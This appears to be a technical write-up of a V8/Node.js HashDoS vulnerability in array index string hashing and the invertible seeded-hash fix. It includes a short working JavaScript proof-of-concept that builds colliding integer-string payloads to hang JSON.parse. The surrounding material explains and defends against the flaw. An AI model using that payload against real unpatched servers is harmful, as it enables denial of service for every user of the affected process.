The Hash That Has to Undo Itself: V8's Array Index HashDoS Problem

HashDoS is not a new problem. Scott Crosby and Dan Wallach described the attack in 2003: hash tables promise O(1) average-case lookup, but an attacker who can force every key into the same bucket turns insertion of N items into O(N²) work. The 2011 disclosure coordinated by Alexander Klink and Julian Wälde turned this into a real-world crisis, demonstrating that a single HTTP request with carefully crafted POST parameter names could pin server CPUs across PHP, Python, Ruby, Java, and dozens of other platforms.

Most languages responded the same way: seed the hash function with a random secret at startup. Python added PYTHONHASHSEED randomization in 3.3. Perl followed in 5.18. Ruby switched to a seeded variant and later SipHash. Rust ships std::collections::HashMap with SipHash-1-3 seeded from thread-local randomness by default. The principle is simple enough: if the attacker cannot predict the hash value of a given key, they cannot construct a set of keys that all land in the same bucket.

V8 followed this path too, adopting a seeded rapidhash for regular string keys. But a gap remained, and that gap was patched in the March 2026 Node.js security release as CVE-2026-21717. The affected versions span Node.js 20 through 25; fixes landed in v20.20.2, v22.22.2, v24.14.1, and v25.8.2.

The gap exists because of a design choice that predates the security concern by years. Every string in V8 carries a 32-bit raw_hash_field. For ordinary strings, bits 2 through 31 hold the seeded rapidhash output. For array index strings, the layout is different:

"1234" (length=4, value=1234, type: kIntegerIndex = 0b00):
 +--------+--------------------------+---+
 | 000100 | 000000000000010011010010 |0 0|
 | length |      numeric value       |   |
 +--------+--------------------------+---+
 31     26 25                       2 1  0

Array index strings are strings that look like valid JavaScript array indices: "0", "42", "1234", any non-negative integer up to 2³²-1. V8 special-cases them so that integer extraction, typed array indexing, and element access can skip character-by-character parsing and read the value directly from the hash field. When you write arr[42] or call parseInt on an already-interned integer string, V8 extracts the number with a couple of shifts rather than looping over digits. That field is doing two jobs at once: it is both the hash used for table lookup and the stored representation of the integer.

The consequence for security is that, before this fix, an attacker could predict the hash of any array index string exactly. V8’s string table uses open addressing with quadratic probing, where the initial slot is hash & (capacity - 1). With typical table capacities below 2²⁴, the length bits in the hash field are masked away; the slot depends only on value mod capacity. Finding a chain of collisions requires nothing more than arithmetic:

const payload = [];
const val = 1234;
const MOD = 2 ** 19;
const CHN = 2 ** 17; // chain length
const REP = 2 ** 17; // repetitions of the target value

let j = val + MOD;
for (let i = 1; i < CHN; i++) {
  payload.push(`${j}`);
  j = (j + i) % MOD;
}
for (let k = 0; k < REP; k++) {
  payload.push(`${val}`);
}

// ~2 MB payload causes ~30 seconds hang in JSON.parse()
const string = JSON.stringify({ data: payload });
JSON.parse(string);

JSON parsing is the easiest trigger. When JSON.parse encounters a string value, it internalizes it into V8’s string table. An object with many distinct integer-string keys, or a large array of integer values, forces repeated interned string lookups through an artificially long collision chain. About two megabytes of JSON input produced roughly thirty seconds of CPU hang in testing.

Why the Standard Fix Does Not Apply

The obvious response is to seed the array index hash the same way regular strings are seeded. The problem is reversibility. Every other language that uses seeded hashing stores the original key alongside the hash in the map entry. Python’s dict stores the key object. Rust’s HashMap stores the key. The hash is used only to find the bucket; the actual key is there for comparison and retrieval.

V8’s array index string hash is not like that. The numeric value IS the hash, reconstructed from the hash field at every point where V8 needs an integer from an integer-like string. If you replace the stored value with a one-way hash of it, you lose the fast integer extraction path. Every arr[42] would fall back to parsing characters, and the performance regression would affect every JavaScript workload, not just the security-sensitive ones.

The fix must use a bijection: a function that maps each 24-bit integer to a unique 24-bit output, seeded with a random key, and invertible by any code that holds the same key. The constraint rules out SipHash, SHA-anything, MurmurHash in its standard form, and every other non-invertible design.

Why Naive Bijections Fail

The two simplest invertible operations over a fixed-width integer space both fall short for different reasons.

XOR with a secret, hash = value ^ secret, is perfectly invertible (just XOR again), but it has no diffusion at all. Each output bit depends on exactly one input bit. An attacker who wants values that agree in the low k bits of the output just needs values that agree in the low k bits of value XOR secret, which means agreeing in the low k bits of value since the secret is constant. Collisions at any table capacity are trivial to construct.

A linear congruential step, hash = (m * value + c) & mask with odd m, is also bijective, but it is linear over the integers modulo 2^N. Low output bits depend only on low input bits, because multiplication carries propagate upward. An attacker targeting a table of capacity 32768 (2¹⁵) only needs values whose low 15 bits match after linear transformation, which is solvable by simple modular arithmetic regardless of the secret multiplier.

Both fail for the same underlying reason: they do not satisfy the Strict Avalanche Criterion. Flipping one input bit should flip each output bit with probability 0.5. Neither XOR-only nor multiply-only transformations come close to that.

The Xorshift-Multiply Solution

The fix developed by Joyee Cheung (Igalia, sponsored by Bloomberg) combines two operations from different algebraic groups, which is the key insight behind mixing functions in hash constructors like MurmurHash and xxHash. A right-shift XOR, x ^= x >> k, is nonlinear over the integers but purely linear over GF(2). It propagates information from high bits to low bits. Multiplication by an odd constant is nonlinear over GF(2) but linear over the integers, and carries propagate information from low bits to high bits. Alternating these two directions of propagation produces diffusion that neither alone can achieve.

The implementation uses three rounds over 24-bit values, with odd multipliers derived from the same random secrets V8 already generates at startup for rapidhash:

const uint32_t kMask = (1 << 24) - 1;
const uint32_t kShift = 12; // half the bit width

uint32_t SeedArrayIndexValue(uint32_t value, uint32_t m[3]) {
  uint32_t x = value;
  x ^= x >> kShift; x = (x * m[0]) & kMask; // round 1
  x ^= x >> kShift; x = (x * m[1]) & kMask; // round 2
  x ^= x >> kShift; x = (x * m[2]) & kMask; // round 3
  x ^= x >> kShift;                          // finalize
  return x;
}

uint32_t UnseedArrayIndexValue(uint32_t hash, uint32_t m_inv[3]) {
  uint32_t x = hash;
  x ^= x >> kShift; x = (x * m_inv[2]) & kMask; // undo round 3
  x ^= x >> kShift; x = (x * m_inv[1]) & kMask; // undo round 2
  x ^= x >> kShift; x = (x * m_inv[0]) & kMask; // undo round 1
  x ^= x >> kShift;                              // finalize
  return x;
}

The final xorshift step is its own inverse because k = bit_width / 2 makes it an involution. The modular inverses of the multipliers are computed once at startup using Newton’s method and stored in the HashSeed structure alongside the multipliers. Inversion is four xors, four shifts, three multiplies, and three masks: more work than extracting a raw stored integer, but competitive with character-by-character integer parsing for strings longer than four digits.

Two rounds are not enough. Statistical testing across many randomly sampled multiplier pairs showed that the bias of a 2-round construction varies widely, with some pairs producing bias scores as high as 40 on a scale where 0 is ideal. Three rounds bring the mean bias to around 0.5 with a standard deviation of 0.2, which is stable enough that no multiplier pair will produce a weak hash. This analysis draws on methodology from Chris Wellons’ hash-prospector project, which exhaustively searches for low-bias integer hash constructions using the same xorshift-multiply family.

Performance

The concern with any change to V8’s hot paths is measurable regression across benchmarks that represent real workloads. The patch was tested against SunSpider, Kraken, Octane, and JetStream 3. The results across all four were within measurement noise: Kraken showed +0.2%, Octane showed -0.1%, JetStream 3 showed -0.15%. The change is performance-neutral in practice.

This holds because the seeded decode path, though more expensive than a raw bit-field extraction, is rarely the bottleneck in any real computation. Integer strings are one input pattern among many, and the absolute cost of four xors and three multiplies is small relative to the surrounding work.

Scope and Deployment

The fix is enabled in Node.js via a V8 build flag (v8_enable_seeded_array_index_hash), but deliberately disabled in Chrome. The asymmetry is intentional: in a browser, a HashDoS attack can hang one tab, which the user can close. On a server running Node.js, one crafted HTTP request can saturate the event loop thread and take down the entire process for all concurrent users. The performance trade-off is worth making in one context and not the other.

Deno and Cloudflare Workers were notified during the coordinated disclosure and are coordinating their own deployments. The analysis repository documents the statistical testing used to validate the construction.

The broader lesson from this patch is that security constraints and performance constraints do not always point in the same direction, but they are not always in conflict either. The array index hash field in V8 was an optimization: skip parsing, read the value from the hash. That optimization created a security gap that could not be closed with the techniques that worked everywhere else. The solution required finding a construction that satisfied both constraints simultaneously, which took careful analysis of diffusion properties, algebraic structure, and performance cost. The original advisory from Joyee Cheung is one of the more thorough write-ups of this kind of constraint negotiation that has appeared in a public security disclosure.